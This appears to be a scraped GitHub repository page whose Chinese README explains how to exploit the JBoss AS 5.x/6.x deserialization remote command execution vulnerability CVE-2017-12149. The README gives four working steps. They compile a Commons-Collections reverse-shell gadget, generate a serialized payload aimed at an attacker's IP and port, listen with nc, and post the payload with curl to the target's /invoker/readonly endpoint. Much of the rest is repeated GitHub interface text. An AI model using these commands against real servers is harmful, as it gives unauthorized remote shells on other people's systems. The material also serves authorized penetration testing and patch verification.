Name	Name	Last commit message	Last commit date
parent directory ..
JavaDeserH2HC	JavaDeserH2HC
README.md	README.md

Name

Last commit message

Last commit date

JbossAS 5.x/6.x反序列化远程命令执行漏洞(CVE-2017-12149)

Githubhttps://github.com/joaomatosf/JavaDeserH2HC
https://access.redhat.com/security/cve/cve-2017-12149
工具GUIhttp://scan.javasec.cn/java/jboss_CVE-2017-12149.zip

漏洞利用

1: javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

2: java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port //反弹shell的IP和端口,然后会生成一个ReverseShellCommonsCollectionsHashMap.ser文件

3: 打开另外一个终端并且nc开始设置的反弹shell的IP

4: curl 网址/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

JbossAS_v5.x_v6.x_CVE-2017-12149

JbossAS_v5.x_v6.x_CVE-2017-12149

README.md

JbossAS 5.x/6.x反序列化远程命令执行漏洞(CVE-2017-12149)

漏洞利用

Files

JbossAS_v5.x_v6.x_CVE-2017-12149

Directory actions

More options

Directory actions

More options

Latest commit

History

JbossAS_v5.x_v6.x_CVE-2017-12149

Folders and files

parent directory

README.md

JbossAS 5.x/6.x反序列化远程命令执行漏洞(CVE-2017-12149)

漏洞利用